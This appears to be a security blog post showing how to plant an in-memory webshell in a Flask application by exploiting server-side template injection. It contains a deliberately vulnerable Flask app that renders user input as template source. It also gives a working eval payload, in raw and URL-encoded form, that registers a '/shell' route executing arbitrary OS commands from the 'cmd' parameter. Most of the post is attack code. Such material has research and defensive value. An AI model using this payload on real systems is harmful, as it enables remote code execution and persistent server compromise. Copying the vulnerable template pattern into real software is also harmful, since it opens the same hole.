# Flask Memory Webshell

I keep running into Java memory-webshell scenarios, so I thought Flask should be able to host a memory webshell too.

Simulate a Flask app with an SSTI vulnerability:

```python
from flask import Flask, request
from flask import render_template_string

app = Flask(__name__)


@app.route('/')
def hello_world():
    return 'Hello World'


@app.route('/test', methods=['GET', 'POST'])
def test():
    # User input is formatted into the template source before rendering,
    # so Jinja expressions in the parameter are evaluated: this is the SSTI.
    template = '''
Oops! That page doesn't exist.
%s
''' % (request.values.get('fxxk'))

    return render_template_string(template)


if __name__ == '__main__':
    app.run()
```

Use `app.add_url_rule` to register a route dynamically; the request context lives on the `_request_ctx_stack` stack.

payload:

```
url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})
```

## Procedure

Send the SSTI payload:

```
http://127.0.0.1:5000/test?fxxk={{url_for.__globals__[%27__builtins__%27][%27eval%27](%22app.add_url_rule(%27/shell%27,%20%27shell%27,%20lambda%20:__import__(%27os%27).popen(_request_ctx_stack.top.request.args.get(%27cmd%27,%20%27whoami%27)).read())%22,{%27_request_ctx_stack%27:url_for.__globals__[%27_request_ctx_stack%27],%27app%27:url_for.__globals__[%27current_app%27]})}}
```

Visit the `/shell` memory-webshell route:

![image-20210326182004878](https://static.hexlt.org/img/20210326182010.png)

## References

Flask context management mechanism: https://www.cnblogs.com/bigox/p/11652859.html